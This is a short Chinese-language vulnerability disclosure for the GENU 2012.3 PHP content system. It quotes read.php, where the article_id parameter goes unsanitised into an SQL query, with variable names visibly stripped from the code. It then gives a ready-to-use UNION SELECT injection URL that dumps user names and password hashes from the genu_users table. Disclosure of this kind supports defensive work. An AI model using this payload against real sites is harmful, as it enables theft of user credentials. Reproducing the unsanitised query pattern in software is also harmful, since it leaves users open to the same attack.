### 0x01 漏洞版本软件下载
下载地址:
```
http://www.gnew.fr/pages/download.php?file=GENU-2012.3.tar.gz
```
### 0x02 漏洞代码
read.php
```
include('./../includes/common.php');
page_header(['ARTICLES_READ_TITLE']);
if (isset(['article_id']))
{
->query('SELECT ' . TABLE_ARTICLES . '.article_date, ' . TABLE_ARTICLES . '.article_subject, ' . TABLE_ARTICLES . '.article_text, ' . TABLE_USERS . '.user_id, ' . TABLE_USERS . '.user_name
FROM ' . TABLE_ARTICLES . ', ' . TABLE_USERS . '
WHERE ' . TABLE_ARTICLES . '.user_id = ' . TABLE_USERS . '.user_id
AND ' . TABLE_ARTICLES . '.article_id = ' . ['article_id']);
= ->fetch();
[...]
```
### 0x01 漏洞利用
```
http://[host]/articles/read.php?article_id=null union select 1,concat(user_name,0x3a,0x3a,0x3a,user_password),3,4,5 from genu_users--
```
返回数据库用户名密码
京公网安备 11010502034610号
暂无评论